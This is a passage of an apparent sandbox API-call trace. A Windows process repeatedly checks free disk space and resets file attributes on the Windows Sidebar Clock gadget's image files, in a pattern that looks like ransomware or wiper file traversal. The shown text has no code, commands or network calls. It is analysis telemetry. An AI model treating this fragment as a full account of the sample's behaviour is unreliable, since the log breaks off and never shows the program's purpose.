lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.781] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png", dwFileAttributes=0x80) returned 0 [0131.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.789] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png", dwFileAttributes=0x80) returned 0 [0131.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.798] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png", dwFileAttributes=0x80) returned 0 [0131.802] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.809] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png", dwFileAttributes=0x80) returned 0 [0131.812] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.819] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png", dwFileAttributes=0x80) returned 0 [0131.824] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.828] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png", dwFileAttributes=0x80) returned 0 [0131.832] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.837] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png", dwFileAttributes=0x80) returned 0 [0131.841] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.844] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png", dwFileAttributes=0x80) returned 0 [0131.848] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.852] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png", dwFileAttributes=0x80) returned 0 [0131.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.864] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png", dwFileAttributes=0x80) returned 0 [0131.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.875] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png", dwFileAttributes=0x80) returned 0 [0131.878] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.882] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png", dwFileAttributes=0x80) returned 0 [0131.886] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.890] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png", dwFileAttributes=0x80) returned 0 [0131.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.897] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png", dwFileAttributes=0x80) returned 0 [0131.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.905] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png", dwFileAttributes=0x80) returned 0 [0131.908] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.915] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png", dwFileAttributes=0x80) returned 0 [0131.919] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.928] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png", dwFileAttributes=0x80) returned 0 [0131.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.937] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png", dwFileAttributes=0x80) returned 0 [0131.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.949] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png", dwFileAttributes=0x80) returned 0 [0131.951] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.956] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png", dwFileAttributes=0x80) returned 0 [0131.958] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.963] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png", dwFileAttributes=0x80) returned 0 [0131.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.972] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png", dwFileAttributes=0x80) returned 0 [0131.974] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.982] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png", dwFileAttributes=0x80) returned 0 [0131.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.991] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png", dwFileAttributes=0x80) returned 0 [0131.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.998] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png", dwFileAttributes=0x80) returned 0 [0132.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.016] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png", dwFileAttributes=0x80) returned 0 [0132.018] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.024] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png", dwFileAttributes=0x80) returned 0 [0132.026] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.033] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png", dwFileAttributes=0x80) returned 0 [0132.035] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.039] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png", dwFileAttributes=0x80) returned 0 [0132.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.045] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png", dwFileAttributes=0x80) returned 0 [0132.047] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.052] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png", dwFileAttributes=0x80) returned 0 [0132.054] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.058] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png", dwFileAttributes=0x80) returned 0 [0132.060] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.064] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png", dwFileAttributes=0x80) returned 0 [0132.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.070] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png", dwFileAttributes=0x80) returned 0 [0132.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.078] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png", dwFileAttributes=0x80) returned 0 [0132.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.084] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png", dwFileAttributes=0x80) returned 0 [0132.086] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.090] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png", dwFileAttributes=0x80) returned 0 [0132.092] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.096] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png", dwFileAttributes=0x80) returned 0 [0132.098] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.102] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png", dwFileAttributes=0x80) returned 0 [0132.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.110] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png", dwFileAttributes=0x80) returned 0 [0132.112] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.116] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png", dwFileAttributes=0x80) returned 0 [0132.118] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.122] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png", dwFileAttributes=0x80) returned 0 [0132.124] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.266] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png", dwFileAttributes=0x80) returned 0 [0132.268] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.273] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", dwFileAttributes=0x80) returned 0 [0132.275] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.286] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", dwFileAttributes=0x80) returned 0 [0132.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.294] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", dwFileAttributes=0x80) returned 0 [0132.296] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.300] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", dwFileAttributes=0x80) returned 0 [0132.302] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.310] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", dwFileAttributes=0x80) returned 0 [0132.312] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.316] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", dwFileAttributes=0x80) returned 0 [0132.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.324] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", dwFileAttributes=0x80) returned 0 [0132.326] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.333] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", dwFileAttributes=0x80) returned 0 [0132.335] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.339] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", dwFileAttributes=0x80) returned 0 [0132.341] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.345] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", dwFileAttributes=0x80) returned 0 [0132.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.351] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", dwFileAttributes=0x80) returned 0 [0132.353] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.358] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_s.png", dwFileAttributes=0x80) returned 0 [0132.360] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, 